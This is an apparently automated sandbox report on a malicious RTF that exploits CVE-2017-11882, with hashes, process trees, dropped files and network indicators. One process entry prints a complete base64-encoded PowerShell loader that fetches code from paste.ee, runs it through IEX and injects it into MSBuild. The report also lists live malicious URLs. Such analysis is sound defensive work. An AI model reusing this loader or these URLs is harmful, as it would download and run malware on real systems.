analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

6086271296897024.zip

Full analysis: https://app.any.run/tasks/0a932e63-544c-414c-9f95-7c760b543004
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: July 12, 2020, 13:15:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
trojan
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

4E22C5136038AB55F52BE855DA0BB996

SHA1:

7156DC58D9FC30DE7FA19AD3B419C7A0FBFBAA78

SHA256:

958F396FD5BE84958909AC04E4EF6B93D5880CF53A050BC63269F42650AE63C2

SSDEEP:

3072:uOUWF6qQxZMohJ9c1Jbo22OQlrzTz5ukuruu+s7RuN:EU1iZPhJ9U72OQdzTNti+sNuN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 908.exe (PID: 1244)
    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 1752)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • EQNEDT32.EXE (PID: 1752)
    • Executed via COM

      • EQNEDT32.EXE (PID: 1752)
    • Executes PowerShell scripts

      • 908.exe (PID: 1244)
    • Creates files in the user directory

      • EQNEDT32.EXE (PID: 1752)
      • powershell.exe (PID: 2124)
    • Reads Internet Cache Settings

      • EQNEDT32.EXE (PID: 1752)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3012)
    • Reads settings of System Certificates

      • EQNEDT32.EXE (PID: 1752)
      • powershell.exe (PID: 2124)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3012)
    • Manual execution by user

      • WINWORD.EXE (PID: 3012)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: 8a368db4df55b8ea68fdb0e355914aa29578431c22bad172a0fc6d8e7a4ba522
ZipUncompressedSize: 365817
ZipCompressedSize: 117115
ZipCRC: 0xe8f1c18f
ZipModifyDate: 1980:00:00 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0009
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
54
Monitored processes
17
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winrar.exe no specs winword.exe no specs eqnedt32.exe 908.exe powershell.exe msbuild.exe no specs msbuild.exe no specs msbuild.exe no specs msbuild.exe no specs msbuild.exe no specs msbuild.exe no specs msbuild.exe no specs msbuild.exe no specs msbuild.exe no specs msbuild.exe no specs msbuild.exe no specs msbuild.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
556"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\6086271296897024.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3012"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\8a368db4df55b8ea68fdb0e355914aa29578431c22bad172a0fc6d8e7a4ba522.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1752"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
1244C:\Users\Public\908.exeC:\Users\Public\908.exe
EQNEDT32.EXE
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.0.0.0
2124"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAEwAawBtAFQAZAAnACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA0ADgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIwAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8ASABBADAAOQBkACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
908.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3484"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
4294967295
Version:
2.0.50727.5420 built by: Win7SP1
3836"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
4294967295
Version:
2.0.50727.5420 built by: Win7SP1
3284"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
4294967295
Version:
2.0.50727.5420 built by: Win7SP1
4088"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
4294967295
Version:
2.0.50727.5420 built by: Win7SP1
1712"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
4294967295
Version:
2.0.50727.5420 built by: Win7SP1
Total events
2 661
Read events
1 472
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
4
Text files
4
Unknown types
5

Dropped files

PID
Process
Filename
Type
556WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb556.11415\8a368db4df55b8ea68fdb0e355914aa29578431c22bad172a0fc6d8e7a4ba522
MD5:
SHA256:
3012WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRD611.tmp.cvr
MD5:
SHA256:
1752EQNEDT32.EXEC:\Users\admin\AppData\Local\Temp\CabE767.tmp
MD5:
SHA256:
1752EQNEDT32.EXEC:\Users\admin\AppData\Local\Temp\TarE768.tmp
MD5:
SHA256:
2124powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NTV61T3VP6NGRZ86E8R2.temp
MD5:
SHA256:
1752EQNEDT32.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08binary
MD5:BC1667EF48D5B00ED122BBD5211106BA
SHA256:D36E5FB0141F227D27E1C716F57AD9B772EB52292CE11E50DAA65D3B67AF8092
1752EQNEDT32.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\YSRS8O6X.txttext
MD5:793AD7C4083C5DCA624D3C38D33C7FE1
SHA256:566B3D7E1440AC5F5E1FC4C88F4923E94D317E66C05FCF7A31BAA19B4AF2A485
3012WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:370590E8C03082DE140E0908302D5FB5
SHA256:D1B1854C78F45C5BAA04BE1F1253A9590EE46994294C5E804020AF95E30C7FB3
3012WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\8a368db4df55b8ea68fdb0e355914aa29578431c22bad172a0fc6d8e7a4ba522.rtf.LNKlnk
MD5:93F530D78A794BDEEBAE39D991643340
SHA256:91F73D3A603D9848096D9B028FDDB7044308D274A9E30FBD126EE3EC76919981
2124powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16f5ee.TMPbinary
MD5:4282EB62D5CEC4159F21BCBA409BBD04
SHA256:553F7C4296E4B0D9FFD6950190BF439155DE37F75EABE290509CE71671511EE5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
7
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1752
EQNEDT32.EXE
GET
301
67.199.248.10:80
http://bit.ly/38JAeJi
US
html
116 b
shared
1752
EQNEDT32.EXE
GET
200
2.16.107.73:80
http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D
unknown
der
1.37 Kb
whitelisted
1244
908.exe
GET
301
172.67.219.133:80
http://paste.ee/r/bZoYo
US
html
162 b
shared
2124
powershell.exe
GET
301
172.67.219.133:80
http://paste.ee/r/LkmTd
US
html
162 b
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1752
EQNEDT32.EXE
2.16.107.73:80
isrg.trustid.ocsp.identrust.com
Akamai International B.V.
suspicious
1752
EQNEDT32.EXE
67.199.248.10:80
bit.ly
Bitly Inc
US
shared
1752
EQNEDT32.EXE
5.79.72.163:443
u.teknik.io
LeaseWeb Netherlands B.V.
NL
malicious
2124
powershell.exe
172.67.219.133:80
paste.ee
US
malicious
1244
908.exe
172.67.219.133:80
paste.ee
US
malicious
2124
powershell.exe
172.67.219.133:443
paste.ee
US
malicious
1244
908.exe
172.67.219.133:443
paste.ee
US
malicious

DNS requests

Domain
IP
Reputation
bit.ly
  • 67.199.248.10
  • 67.199.248.11
shared
u.teknik.io
  • 5.79.72.163
whitelisted
isrg.trustid.ocsp.identrust.com
  • 2.16.107.73
  • 2.16.107.80
whitelisted
paste.ee
  • 172.67.219.133
  • 104.18.49.20
  • 104.18.48.20
shared
pastecode.xyz
malicious

Threats

Found threats are available for the paid subscriptions
2 ETPRO signatures available at the full report
No debug info